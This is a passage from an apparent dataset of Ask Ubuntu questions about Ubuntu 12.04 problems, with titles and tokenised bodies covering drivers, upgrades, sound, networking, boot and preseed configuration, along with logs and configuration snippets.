- > ../dm-0 lrwxrwxrwx 1 root root 7 2012-05-01 20:01 isw_bjcjaghhjj_data1 - > ../dm-1 lrwxrwxrwx 1 root root 7 2012-05-01 20:01 isw_bjcjaghhjj_data2 - > ../dm-2 lrwxrwxrwx 1 root root 7 2012-05-01 20:01 isw_bjcjaghhjj_data3 - > ../dm-3 can you help me resolve this issue and obtain access to my raid array again ? thank you .
129553	ubuntu 12.04 is unable to create properties window and play some files	ubuntu 12.04 is unable to create properties window and play some mp4 , flv files . is that going to be fixed soon ?
129557	wubi installation on a whole-disk-encrypted system ?	i have a laptop with whole disk encryption . can i still install using wubi ?
129558	ubuntu logs me out when trying to look at images from a dvd	i insert a dvd into my computer , and i can see the image thumbnails , but when i go to click on an image , my computer logs me out . this is frustrating and ridiculous , please help .
129559	open a song in rhythmbox without importing it ?	i have just upgraded to ubuntu 12.04 so i have rhythmbox installed by default . i do n't mind to much , however i miss one thing from banshee : `` file system queue '' . in banshee , i had the option not to import a file opened via the file browser ( or the dash ) . i ca n't find that option in rhythmbox and i 'd like to have it , since there are a lot of audio files which i do n't want to have in my library . is there any plugin or something like that ? thanks !
129561	lower level of wireless signal on an intel centrino wireless-n + wimax 6150	i am sitting next to my router and i do n't see full wireless signal since i upgraded from ubuntu 11.04 64bit to ubuntu 12.04 and i noticed more battery usage in my laptop , since i upgraded . ( that makes sense when the wireless signal is weak the laptop uses more energy ) my wireless card is intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) i have toshiba satellite-p745
129563	vsftpd configuration problems with 12.04	so i upgraded my ubuntu server to 12.04 lts today and now vsftpd wont work . i think it is related to this vsftpd stopped working after update . however , unlike the asker in that post , i am not getting any error messages . when i log on , i get 220 ( vsftpd 2.3.5 ) 331 please specify the password . password : 530 login incorrect . ftp : login failed i know the password is correct , and i have tried multiple users . vsftpd.log shows nothing other than : tue may 1 15:19:48 2012 [ pid 2 ] connect : client `` 192.168.1.133 '' tue may 1 15:19:53 2012 [ pid 1 ] [ username ] fail login : client `` 192.168.1.133 '' syslog shows nothing . here is my vsftpd.conf ( mostly default ) : listen=yes anonymous_enable=no local_enable=yes check_shell=no write_enable=yes local_umask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chroot_list_enable=yes chroot_list_file=/etc/vsftpd.chroot_list secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem i tried the command mentioned in the previous question to no avail . sudo chmod a-w /home/user thanks , i appreciate all your help !
129565	`` add to panel '' does n't work with indicator-applet-complete	i 've recently installed ubuntu 12.04 and i 'm using gnome classique ( gnome-panel . ) eveything is fine except that i have a problem when using 'add-to-panel ' ( super-key + alt + right-click ) : it works with anything but 'indicator-applet-complete ' , ie nothing is added to the panel . i 've tried to re-install packages and check configuration files but i could n't fix this so far . so , has anybody experienced the same issue ? or did i miss something ? any hints are welcome . thanks .
129566	remove documentation to save hard drive space	i like to create a rather small ubuntu installation in a virtual box machine . it should basically just provide tex live and related tools . i figured now that i have almost 1gb of data under /usr/share/doc . i do n't need this documentation in this case , just the latex related man pages , which are not located there . is there a way to uninstall all these documentation files using apt-get ? alternatively , is it reasonably save to just delete the content of /usr/share/doc ? i like to share the virtual box machine with others , which should n't run in trouble .
129569	ubuntu slow after upgrade to 12.04 precise	i normally choose ubuntu over windows because speed and stability is something that 's important to me . however , recently ubuntu has been slower than windows for me . i use two systems -- one netbook ( for writing ) , and one desktop ( for production ) -- that i 've been using since karmic koala , and never formatted ever since ; for ever release , i simply upgraded the os and now i 'm on precise pangolin . a lot of reviews say that precise boosts performance of the system , but for me it 's gotten slower than ever -- both the interface performance and the startup . i also did a bit of cleanup , removing unwanted software and clearing the start-up menu , but that does n't seem to help at all . on the netbook , i chose unity2d , but even that has been buggy and slow for me . along with slowness , i have also been experiencing other problems , though that is probably wise to keep for another question ( the problems include repository errors , wacom pressure breakage , etc . ) any way i could speed the system up without the need to format it ? desktop : amd athlon x2 , 3gb ram ddr2 , 9600gt geforce netbook : hp mini , intel atom , 1gb ram . edit : chu @ chu-laptop : ~ $ top -sbn1 | head -n20 top - 11:57:06 up 51 min , 1 user , load average : 3.03 , 2.00 , 2.71 tasks : 173 total , 1 running , 172 sleeping , 0 stopped , 0 zombie cpu ( s ) : 44.4 % us , 13.5 % sy , 5.7 % ni , 26.4 % id , 9.8 % wa , 0.0 % hi , 0.2 % si , 0.0 % st mem : 988880k total , 914836k used , 74044k free , 37056k buffers swap : 1951860k total , 160424k used , 1791436k free , 340268k cached pid user pr ni virt res shr s % cpu % mem time+ command 28 root 20 0 0 0 0 s 3 0.0 0:15.08 kswapd0 20577 chu 20 0 2832 1148 864 r 3 0.1 0:00.06 top 4273 chu 20 0 862m 138m 23m s 2 14.3 18:13.77 firefox 5903 chu 20 0 214m 26m 11m s 2 2.7 6:41.92 plugin-containe 20321 chu 20 0 227m 16m 11m s 2 1.7 0:02.53 gnome-terminal 1 root 20 0 3644 1280 612 s 0 0.1 6:15.79 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:10.98 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 8 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 10 root 20 0 0 0 0 s 0 0.0 0:13.35 ksoftirqd/1 13 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 14 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper chu @ chu-laptop : ~ $ dstat 60 5 you did not select any stats , using -cdngy by default . -- -- total-cpu-usage -- -- -dsk/total- -net/total- -- -paging -- -- -system -- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 47 13 29 10 0 0|1072k 238k| 0 0 | 18k 44k|1175 2299 16 6 64 14 0 0|1224k 89k| 440b 471b|6622b 2048b| 890 1801 37 10 50 3 0 0| 199k 65k| 15k 2660b| 10k 0 |1175 2134 35 9 47 9 0 0|1207k 97k| 592b 302b| 28k 95k|1255 2105 26 10 14 49 0 0|1985k 645k|1049b 575b| 54k 635k|1295 2133 missed 8 49 11 36 4 0 0| 367k 37k| 24k 1910b| 58k 0 |1129 1969
129579	creating a hotspot in lubuntu	i am trying to make a hotspot in lubuntu . the problem is that i ca n't seem to connect to it . after creating the hotspot how do i activate it ? do i click on `` connect to hidden wireless network '' ? i followed this guide , http : //freshtutorial.com/create-your-own-wifi-hotspot-in-ubuntu-11-10/ with no success .
129582	problems selecting themes using my unity	this question may be subjective but i am having problems selecting gtk3 themes using my unity . background some gtk3 theme installation instructions ask you place the extracted theme folder in ~/.themes ( hidden in your home folder ) and here is where the problem starts ( for my unity ) . i have to use advanced settings ( gnome tweak tool ) to select themes from the home folder to get the theme working correctly . when i review the selected theme in my unity it places a big red x beside the selected theme name . themes installed in ~/.themes do not work correctly when selected in my unity i resolved this by ignoring gtk3 installation instructions and copying the same theme folders to usr/share/themes using sudo nautilus . these themes work perfectly now when selected in my unity . does anyone know why this behavior happens in my unity ( when themes are placed in ~/.themes , and can it be fixed . this is not machine specific as it happens on my daughters laptop as well .
129583	how can i download archive of ubuntu community documentation so that i can use it offline ?	how can i download archive of ubuntu community documentation so that i can use it offline ?
129584	vmware tools easy install relic	i made a fresh 'easy install ' of 12.04 on vmware workstation . this is yet another problem ( quite a few have been asked here . ) with the vmware tools installation . i managed to install vmware tools manually . but i still end up at the terminal with a message - i have managed to change the default runlevel to 5 and have made sure that x11 common and lightdm are started at runlevel 5 ( used sysv-rc-conf & checkconfig ) . when i login , i am at runlevel 5 , but lightdm or x server are not in the ps aux list . what am i missing ? how do i get rid of this message and start the graphical login manager ? ps : i installed a gb of other apps by logging in and really wanted to salvage it over reinstalling .
129597	how do i fix my installation of ati catalyst video driver in 12.04 lts ?	my graphic card is a mobility radeon hd 4200 series . i tried the 2 answers from what is the correct way to install ati catalyst video drivers ( fglrx ) ? but unfortunately , it does not work for my mobility radeon hd 4200 note when i raised this question in may 2012 , there was only 2 answers to stephen myall 's question , since then many answers have been added to his post , it is the master post about this subject
129600	bluetooth keyboard wo n't connect until pin verification	i want to connect my bluetooth keyboard ( macintosh ) at startup . but what should i say , i have to enter a pin , without a keyboard is connected ... is there a way to connect my keyboard without to buy a usb-keyboard ? my mouse wo n't connect , too - i have to enter a pin there as well ! edit : i have a thinkpad x60s , too . is there any chance to pair my thinkpad ( ubuntu ) with my machine ( ubuntu ) via bluetooth ?
129604	i just upgraded from 11.10 to 12.04 . now my dcm4313 wireless card is n't working . help ?	i 've tried everything i can think of and used all the official documentation to try to fix it but nothing is working . what gives ? would a clean install work ? anyone have a suggestion ? ps . i 'm not that computer savvy , please explain like i 'm five .
129605	what do i need to take into account assembling an ubuntu desktop pc ?	i 'm looking into building my own computer . however , i 've never done this before . i 've used ubuntu my whole life and am intending to continue to do so , so i 'd like to make sure all the hardware works out of the box with ubuntu - preferably even with open source drivers ( i.e . without having to install proprietary drivers after installation ) . if that 's not possible , then at least from a company making work of their linux support . so , what are things to watch out for ? how best to approach this task ? for example , which components are often most problematic -- i.e . which is best to start with ? how can i be sure that each component plays nice with the rest ?
129608	ubuntu 12.04 had been installed but bootstrapper only loaded windows 7	i installed ubuntu 12.04 with dvd , i used `` something else and divided hardisk into 2 partition , linuxwsp and / ( root ) . i installed in / and in the last installation , ubuntu required to eject the disk , i removed the disk and rebooted . but having rebooted , windows automatically started up and no grub was appeared . how should i dot to fix this troubleshooting . sorry , my english is not so well . i 'm very grateful for your answer .
129610	login screen wo n't accept my password	i recently upgraded to 12.04 from 11.10 and since upgrading have been unable to login to my user profile . the upgrade went okay and i can login to a guest session fine but whenever i try to login to my profile , after entering my password , i just return to the login screen . i 've changed my password in root ( passwd 'username ' ) and can log in to tty1 with no issues , it 's just in gui i 'm having problems . i 'm using a hp dv7 laptop , 32 bit ubuntu install , intel® core™2 duo cpu p7350 @ 2.00ghz × 2 , nvidia graphics . any help would be appreciated .
129621	ubuntu locks up when swap full	i have a ubuntu system running xfce and 2 gb ram . i have a 1gb swap file which , when multitasking begins to fill up . when i have even a small amount of free swap , i have no issues , but the second the swap fills , the system locks up . not even the mouse will move , although , i am able to use [ alt ] + [ sysrq ] + [ k ] to kill xfce , which still necessitates a reboot to get up and running again . i will provide more system details if they are needed . thanks in advance .
129627	x server not running on 12.04	i 've installed ubuntu 12.04 on my amd64 desktop . the problem is that the lightdm is n't running . if i boot ubuntu 12.04 with the live dvd the x server runs , but if i run it from the hard drive its broken . what is the problem ?
129628	why does installing wine in 12.04 from regular repo require removing non-related packages ?	i 've a fresh install of 12.04 64bit and have had only a few issues so far , all of them minor , until now that is . in order to install wine the software center is telling me i need to remove all of the following : debhelper gettext intltool-debian po-debconf system-config-lvm virtualbox-source where is this list coming from ? i only have the standard canonical repo and the one for canonical partners enabled .
129638	updating packages on ubuntu alternate cd	is there any way to update the packages on an ubuntu install cd ? i have a customized alternate install cd ( to automatically install ubuntu and set it up for me ) , and i would like to update all the default packages that are installed for ease of deployment reasons . in the windows world , you could do this with various tools and they called it slipstreaming . i am using 11.04 , so the daily builds that ubuntu has will not work for me , as they only seem to support lucid and precise at the moment . i have looked at uck ( ubuntu customization kit ) , but it only seems to work for adding packages .
129641	xinerama = 1 loses theme	i am testing out 12.04 and am using xinerama = 1 in xorg.conf . when i do this , everything seems to work , except that some applications end up with strange looking buttons . please see this image : click here for an enlargement of the image . as soon as i change the xinerama to 0 , i lose my quad screen , but all applications look normal again . why does this happen and is it possible to fix this ? i 'm using gnome classic on ubuntu 12.04 because i could n't get unity2d or unity3d to work over 4 screens .
129648	why ca n't i see the cursor ?	i installed ubuntu 12.04 on my computer , which has an amd sempron 3000+ 1.8 ghz cpu and 512 mb of ram , and i could n't see my cursor . so i uninstalled it and then installed 11.10 , but i still ca n't see my cursor , even after updates . any suggestions ?
129649	ubuntu 12.04 wo n't install from usb to asus eee netbook	please help : ) i 've made the bootable usb all fine and dandy , press enter to install , it flashes and then does nothing ! just stays on the same screen counting down from 30 per usual . my netbook is fine , my hard drive is fine , the copy of ubuntu is fine , i do n't have any clue whatsoever what the problem could be . i 've installed ubuntu on this machine before , the latest version seems to have alot of problems . it was only a few days ago that my desktop decided not to load but the screen would .
129651	how do i configure a preseed to skip the language support question ?	i 'm attempting to create a preseed configuration file for automating the install of ubuntu server 10.04-4 lts x64 via a bootable usb thumb drive and i 've hit a major snag in the process . the debian-installer correctly processes the preseed file until it fails and asks for input at the following screen : '' [ ! ] select and install software the installation cd does not contain full support for your language . do you want to download the required packages from the internet now ? this includes spell-checking , dictionaries , and translations for various applications . if you do not want to download this now , you may start the language selector after installation to install complete support for your language . download language support ? `` yes '' `` no '' thus far i 've tried modifying the kernal boot line and tried making various tweaks to the preseed file , all to no avail . any help is greatly appreciated as i 'm out of ideas ! ! i 've included my kernal boot line and preseed file ( newestattempt.seed ) below . i 'm aware the preseed file may have additional errors/problems , but i ca n't resume my testing until this issue is fixed . also , please note i 've replaced sensitive information about my configuration with dummy examples : kernal boot line : kernel /install/vmlinuz append vga=normal initrd=/install/initrd.gz locale=en_us console-setup/ask_detect=false console-setup/layoutcode=us netcfg/wireless_wep= interface=eth0 hostname=example domain=example file=/cdrom/customseed/newestattempt.seed cdrom-detect/try-usb=true quiet` -- preseed file ( i posted a link because i ca n't get this forum to not bold lines that start with # , which is most of the file ) : http : //reed.blacklight.net/preseed/newestattempt.seed
129653	how to adjust unity icons and and pane size ?	i 'd like to use smaller icons ( 24x24 or so ) to make my unity panel thinner and `` higher '' ( to let more icons fit vertically ) . how to do this ?
129655	how would i go about uninstall my current nvidia drivers and reinstalling them ?	can i do this easily without borking my system ?
129656	how do i downgrade nvidia drivers in 12.04 ?	i am experiencing a problem described in this topic , which i now suspect is due to a bug in the 295.40 version of the nvidia drivers . are there any builds available for ubuntu 12.04 precise based on the 280 or 290 branches that i can use to downgrade ? i had a look at the x-swat ppa but it looks like launchpad removes all old builds when a new one is available ?
129661	nvidia driver + ubuntu 12.04	this seems very common topic these days but i have some additional problems . the additional drivers option is greyed out , and it says there are no drivers being used . the graphics driver shows `` unknown '' in the system settings and i cant configure multiple monitors as it wont detect displays at all . i have the latest driver from nvidia 295.40 installed . i also tried to manually start x server by sudo service lightdm start and contrary to the config settings it says its already running i have an dell xps with nvidia geforce gt 420m . thanks in advance please follow links for images
129664	how do i install half-life 1 and 2 ?	how do i install half-life 1 and 2 on ubuntu 12.04 if i already have the game on a windows installer cd and on steam . i tried it with steam , but the game did n't launch . i also tried it on wine with the windows installer , but it did n't work either .
129670	how do i modify this preseed snippet to partition my hard drive ?	i 'm attempting to create my first ubuntu server 10.04-4 lts x64 preseed file and i 'm afraid i ca n't figure out the hard drive partitioning aspect : i have a 2tb hard disk that i need configured as follows ( please note this system has hardware raid that is already configured , so the os install merely sees one large hard drive ) : partitions : / - 40 gb ( ext4 , must be bootable ) /swap - 32 gb /local - all remaining free space ( ext4 ) the file systems need to be ext4 ( with the exception of swap of course ) , and / must be bootable . i also need to use regular partitions rather than lvm . also , i do n't care about any data that 's currently on the disk . i 've been trying to cook something up via the examples on this page to no avail : http : //www.tylerlesmann.com/2008/jul/06/fun-preseed/ i just found this example , but am uncertain how to modify it based on my exact needs ( i had to replace all of the # comment signs with & symbols because this forum was bolding all of the comment lines ) : # if not , you can put an entire recipe into the preconfiguration file in one # ( logical ) line . this example creates a small /boot partition , suitable # swap , and uses the rest of the space for the root partition : # d-i partman-auto/expert_recipe string \ # boot-root : : \ # 40 50 100 ext3 \ # $ primary { } $ bootable { } \ # method { format } format { } \ # use_filesystem { } filesystem { ext3 } \ # mountpoint { /boot } \ # . \ # 500 10000 1000000000 ext3 \ # method { format } format { } \ # use_filesystem { } filesystem { ext3 } \ # mountpoint { / } \ # . \ # 64 512 300 % linux-swap \ # method { swap } format { } \ # . any help is greatly appreciated ( please note i 'm incredibly new to *nix , so please handle with care ) ! = )
129671	how can i workaround the xfce4 power manager being broken ?	i just did a clean install of 12.04 on my netbook , then installed xubuntu-desktop . ( the reason for that is the showstopper bugs in 11.10 unity -- like menus not working , or the launch bar capturing the mouse and locking up the machine ) now , the power button does nothing . attempting to go to power settings from the xcfe4 settings times out . i checked , and xfce4-power-manager is running , as well as /usr/lib/upowerd . trying sudo xfce4-power-manager -- dump does nothing for a minute or so , then gives me the following message : ce4-power-manager:4226 ) : xfce4-power-manager-error ** : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . trace/breakpoint trap ( core dumped ) along with the `` crash '' icon on the top panel , which i 've now seen over 30 times in approximately 8 hours of uptime . i 'd be very interested in knowing how to get back up to the level of functionality that i had with 11.10 on this netbook .
129676	can i transfer files from my windows to my wubi installation ?	is there any way to share files between two partitions ? ?
129680	how can i make ibus not ignore ~/.xcompose ?	since uim did n't want to play ball after installing ubuntu 12.04 from scratch , i tried ibus , since that 's the ime framework that 's coming with ubuntu by default . however , ibus-table-compose is a pain in the butt to use because just to enter one character i need to press the key combination to trigger ibus first , enter the respective compose sequence , then press the ibus key combination again to disable it . instead of that i 'd rather like to keep my compose key functionality as provided by xim , since that requires fewer keystrokes . the problem is , though , that when the default input method is set to ibus and ibus is deactivated so that ( aiui , since i started it with ibus-daemon -- xim ) it is bypassed in favor of xim , the settings in ~/.xcompose seem to be overridden by ibus 's own version , so e.g . compose c a does n't give ä ( a-ogonek ) as i defined in the .xcompose file in my home directory , but ç ( a-hacek ) , as defined by some other settings . i 've grown quite accustomed to my own mnemnonics , so is there any way to make my system use my own ~/.xcompose file with the default input method still being set to ibus so that ibus will still work e.g . in openoffice and other applications that do n't let you choose the input method with a context menu ? note : this is not a duplicate of the question how can i get compose back on ibus ?
129682	ca n't find `` spellchecking and writing aids '' setting ?	ca n't find `` spellchecking and writing aids '' setting in language support anymore in ubuntu 12.4 , how could i change this setting now ?
129684	djvu viewer firefox plugin crash	after making a clean install of 12.04 and installing djvulibre firefox plugin it crashes everytime i open access a djvu file . firefox simply says that the plugin has crashed and i should try reloading the page - obviously it does n't work . there 's no error message per se but give me a sign and should it be necessary i 'll add more info . note - everything worked fine on 11.10 .
129685	upgrade from 11.10 to 12.04 failed , ca n't even find the hard drive anymore	i 'm working on upgrading some virtual machines that were on 11.10 and need to be upgraded to 12.04 . ( because of an extremely large mysql database , a fresh install is n't really a good option . ) i do at least have a qa server to test on , and i ran a test upgrade over the weekend on that server . it appeared to work perfectly until the reboot , despite running the risk of doing the upgrade via ssh ( i know it 's not `` recommended '' but i did n't have `` proper '' visual access at that time because of where the machine is actually hosted ) . during the upgrade , i allowed the system to replace /boot/grub/menu.lst with the new package file . so i 'm pretty sure it 's not looking for the old kernel and not finding it . i also allowed it to replace the my.cnf and /etc/apache2/mods-available/alias.conf and planned to manually merge the php.ini and apache2.conf . still , nothing that showed up during the upgrade appeared to give any clue about what was coming next . upon reboot , however it apparently is n't finding the hard drive anymore . it drops into the `` busybux '' built-in shell for what i assume is emergency recovery work after three `` segmentation fault '' errors and reporting that it `` gave up waiting for root device '' . and it says that `` /dev/disk/by-uuid/xxxxxx does not exist . '' running df gives me nothing but the `` udev '' and `` tmpfs '' filesystems , mounted at /dev and /run respectively . i ca n't run fdisk or fsck or anything else similar . i do have a backup of the virtual machine from before the upgrade was attempted , so i figure i 'll just have to rollback and try again . but i 'd sure appreciate it if anybody can tell me just what is going on here so i can fix it ( and/or prevent it ) if it ever happen again .
129686	.iceauthority is missing	can i create a new file .iceauthirity or download it from anywhere ? problem is when i logging in.there is this error message `` ca n't update .iceauthority home/user/.iceauthority '' .but there is no such file with ctrl+h or without it.so i ca n't debug this and looking for solution of this trouble . thanks in advance .
129689	how do i fix grub error 15 on new dual boot install	i just installed 12.04 to dual boot ( separate partitions ) with an existing win 7 . upon reboot after install things freeze after grub 1.5 with a grub error 15 message . is there any easy way to fix this ? ( i am posting this from my second computer ) update : i managed to boot into both 12.04 and win7 using bios : selected the disk with the win7 'c ' partition : resulted in the same error message rebooted , tried the disk with the ubuntu partitions : *grub menu loaded : managed to boot 12.04 , rebooted , used bios again : managed to boot win 7 so , i have access to my computer again ( thru bios ) , but this has been a pretty crappy install experience . garth i used the the final release 12.04 ubuntu install disk , reformatted all linux partitions , and expected a simple clean install . other than specifying the ubuntu partitions , i did a basic install of 12.04 . no way i did do anything to get this crap error failure ! i have no idea why my install resulted in a grub-15 error .
129691	ubuntu 12.04 dual monitors stay mirrored	i just installed ubuntu 12.04 and i 'm having some trouble getting my two monitors working properly . i have one 24 '' samsung and one 23 '' acer , both running 1920x1080 . my video card is a ati hd5870 . by default the monitors are set to mirror but i want it to extend across both screens . i tried to uncheck the mirror option in displays , but it complained that 3840x1080 was too big . i installed the ati propriety drivers and went into catalyst control center and set the displays to be extended like i want . i was prompted to reboot , so i did , and nothing changed - the displays are still mirrored .
129696	launcher makes no colored in ubuntu 12.04	the pitcher does not provide color after removing configuration window . here a video to show : http : //www.youtube.com/watch ? v=f-xmrhoynxe & feature=youtu.be
129697	correct way to get a nice gtk theme	i just tried xmonad and i 'd like to know what is the correct way to avoid the ugly base gtk theme that shows up after a fresh install . i ran into lxappearance but some people were not satisfied it seems . so i thought i 'd take some input on the best way to achieve what i want before jumping into it . my target result is the nice and pretty ubuntu default theme .
129700	can not switch keyboard layouts	my default keyboard layout is norwegian ( from the 12.04 installation procedure ) . but i also want to use icelandic . two layouts in the `` system settings '' → `` keyboard layouts '' is one too many . i can not switch either using a shortcut or in the panel . the panel tells me i have switched , but the letters i type are norwegian , even when the panel seems to have switched to icelandic . my language for menus and windows ( `` system settings '' → `` language support '' ) is english . `` regional formats '' → `` display numbers , dates … . `` : english denmark , what am i doing wrong ?
129708	can not adjust volume on ubuntu 12.04	i am using ubuntu 12.04 live usb on my dell laptop m4400 and the sound is not coming out . the bar level always in the middle and could n't be adjusted , even i used the button on the laptop . this was not happened when i used version 11.10 . anybody here can help me ? regards , lm
129709	why does my system boot into a tty virtual terminal after installing 12.04 ?	first i tried to upgrade to 12.04 and then tried a complete install . each seemed to progress correctly , but the same thing happened afterwards in each case . when the system is rebooted , i see the ubuntu screen and then the command line for a virtual tty terminal . ubuntu 12.04 al-hp-pavilion-dv9000-notebook-pc-tty1 al-hp-pavilion-dv9700-notebook-pc login : i log in and then get : password : i enter the password and then get : last login : tue may 1 17:56 cdt ( gnu/linux 3.2.0-24-generic-pae i186 ) *documentation : https : //help.ubuntu.com/ 20 packages can be updated . 8 updates are security updates . al @ al-hp-pavilion-dv9700-notebook-pc : ~pc : ~ $ at this point , it does not matter what i enter or do , i simply get returned to the last line above this one . help ! al
129714	difficulty setting up sound	i am having some difficulty getting sound to work on my ubuntu machine . i am trying to keep my installation as thin as possible ( older machine ) , so i started off with ubuntu server 12.04 and installed only what i needed . everything is going well , except for sound . i ran sudo apt-get install alsa-base alsa-utils and that installed correctly . i can also run alsamixer ( as root ... not sure why i ca n't do that as a user ) and it seems to see my intel card . ( hda intel , sigmatel stac9227 ) . all channels appear to be unmuted within alsamixer . here is the output that i think is relevant . lsmod | grep '^snd ' | column -t snd_intel9x0 38570 0 snd_ac97_codec 134826 1 snd_intel8x0 snd_hda_intel 33773 0 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd_hda_codec_hdmi 32474 1 snd_hda_codec_idt 70795 1 snd_hda_codec 127706 3 snd_hda_intel , snd_hda_codec_hdmi , snd_hda_codec_idt snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 5 snd_intel8x0 , snd_ac97_codec , snd_hda_intel , snd_hda_codec_hdmi , snd_hda_codec snd_timer 29990 2 snd_seq , snd_pcm snd 78855 12 snd_intel8x0 , snd_ac97_codec , snd_hda_intel , snd_rawmidi , snd_seq , snd_seq_device , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_codec , snd_hwdep , snd_pcm , snd_timer snd_page_alloc 18529 3 snd_intel8x0 , snd_hda_intel , snd_pcm and : ls -l /dev/snd/ total 0 drwxr-xr-x 2 root root 80 may 1 19:35 by-path crw-rw -- -t 1 root audio 116 , 5 may 1 19:35 controlc0 crw-rw -- -t 1 root audio 116 , 8 may 1 19:35 controlc1 crw-rw -- -t 1 root audio 116 , 4 may 1 19:35 hwc0d2 crw-rw -- -t 1 root audio 116 , 7 may 1 19:35 hwc1d0 crw-rw -- -t 1 root audio 116 , 3 may 1 19:35 pcmc0d0c crw-rw -- -t 1 root audio 116 , 2 may 1 19:35 pcmc0d0p crw-rw -- -t 1 root audio 116 , 6 may 1 19:35 pcmc1d3p crw-rw -- -t 1 root audio 116 , 1 may 1 19:35 seq crw-rw -- -t 1 root audio 116 , 33 may 1 19:07 timer update based on comment lspci | grep audio 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv770 hdmi audio [ radeon hd 4850/4870 ]
129717	i ca n't install ocaml plugin in my eclipse	i installed eclipse with sudo apt-get install ubuntu but when i try to install ocaide with help- > install new software . appears this error : an error occurred while collecting items to be installed session context was : ( profile=epp.package.java , phase=org.eclipse.equinox.internal.p2.engine.phases.collect , operand= , action= ) . artifact not found : org.eclipse.update.feature , ocaidefeature,1.2.15.201204281554 . http : //www.algo-prog.info/ocaide/features/ocaidefeature_1.2.15.201204281554.jar artifact not found : osgi.bundle , ocaml,1.2.14.201204281554 . http : //www.algo-prog.info/ocaide/plugins/ocaml_1.2.14.201204281554.jar can you help me ? im desperate because i need this for a college work .
129720	i accidentally hit ctl alt f < num > . how do i return to the gui ?	i 'm using 12.04 , i accidentally used ctl-alt-f9 and got a black full screen with command line cursor ( terminal ) . how can i go back to the normal unity screen ?
129722	my headphone jack stopped working when i upgraded to 12.04	i usually run sound from my laptop through my headphone jack into a mixer so i can listen to music through my big pa speakers . the moment i upgraded the os , however , it stopped working when plugged in , no audio at all . sound still comes through the laptop speakers when unplugged , though . i dual boot , so i logged into windows and the sound worked fine . what should i do to fix it ?
129725	nvidia graphics scrambled ubuntu 12.04	i am using a nvidia geforce 550ti graphics card , with a 55 '' samsung tv everytime i install the nvidia drivers ( either via the gui manager or `` apt-get install nvidia-current '' the graphic signal gets scrambled upon next reboot , flashing colors , i tried running nvidia-xconfig it does n't do anything , i tried nomodeset also . here is the weird part , if i switch between the cli terminal ( tty ) then switch back , the signal is ok ? anyone help me out ? i am running ubuntu 12.04 desktop 64 bit
129730	ubuntu 12.04 menu bar overlap	i have dual monitors for my development machine . i usually have my terminal open fullscreen in my secondary screen as my ide ( vim ) and when i click on my primary screen i get this super ugly menu overlap on my terminal even though its in full screen . the terminal program i use have no menu bars which is why i love it . any help would be awesome .
129736	moonlight 3.99.0.3 is not compatiable with firefox 12 ?	how i can uninstall and reinstall moonlight ?
129738	can i disable the ubuntu splashscreen ?	i wanted to know if it is possible to disable the splashscreen at boot . the one where is says ubuntu and it has the orange dots moving . i want to remove that and be able to see the commands like what you can see when it shuts down like stopping devices and stuff . anyway this is is possible ? thanks !
129740	ubuntu 12.04 - bluetooth phone	i have ubuntu 12.04 lts . when i want to connect my phone via bluetooth , it does n't be recognized . i works fine on windows 7 . on the other hand , in the phone , i see my laptop but i cant connect with it . anybody has an idea on how to solve this ? icon is showing that bluetooth is on but it has n't option of adding a device..
129745	is there a graphical method for modifying users ' group memberships ?	if i want to fine-tune a user 's permissions , can i do it using a graphical interface ? on the user accounts screen i only see the option to change something called `` account type '' between standard and administrator , but i think i remember being able to add and remove users from groups here in the past .
129746	/var partition ran out of space . upgradation of softwares failing . any workaround ?	when trying this : how to install the same softwares in 12.04 which were there in 10.04 ? , after fetching all the packages , during the process of unpacking , my 2.88gb /var partition ran out of space completely . now when i try to run an upgrade or even a partial upgrade of the softwares that i have downloaded , my update manager is crashing and failing complaining that i do not have enough memory left in my /var partition which unfortunately , is true . is there a workaround for this problem ? attaching a screen shot of my hard drive partitions : /dev/sda11 is the one that has run out of space .
129747	upgrade problem - `` dependency problems prevent configuration of libnih-dbus1 ''	i have a problem with the upgrading ... . when i write sudo dpkg -- configure -a , this is what happens ... : dependency problems prevent configuration of libnih-dbus1 : libnih-dbus1 depends on libnih1 ( = 1.0.3-4ubuntu9 ) ; however : version of libnih1 on system is 1.0.3-4ubuntu2 . libnih-dbus1 depends on libc6 ( > = 2.3.4 ) ; however : package libc6 is not installed . dpkg : error processing libnih-dbus1 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libnih-dbus1 please help
129755	keyboard shortcuts not working in 12.04 ?	i ca n't get my shortcuts to work , among other things in 12.04 . anyone else with this problem ? i 'm not very pleased with ubuntu 12.04 so far . what a letdown !
129757	i 'm upgrading to ubuntu 12.04 , and the installation is stuck at preparing libc6	the installation has been stuck here for about 9 hours now . also , applications and files wo n't open , making the computer unusable . would canceling the upgrade be a bad idea at this point ?
129758	shadowgrounds game series do n't work under 12.04 64-bit	i guess the title says it all ... any ideas as to why ? i tried removing potentially offending 32-bit libs ( this is a 32-bit title ) inside the game 's lib32/ folder ( i already have 32-bit libs installed ) . alas , no dice . the worst part is that the game immediately exits when started without reporting a single error . all suggested fixes on the frozenbyte forums have yielded no progress . on a somewhat related topic , other games also exhibit problems , like crayon physics deluxe .
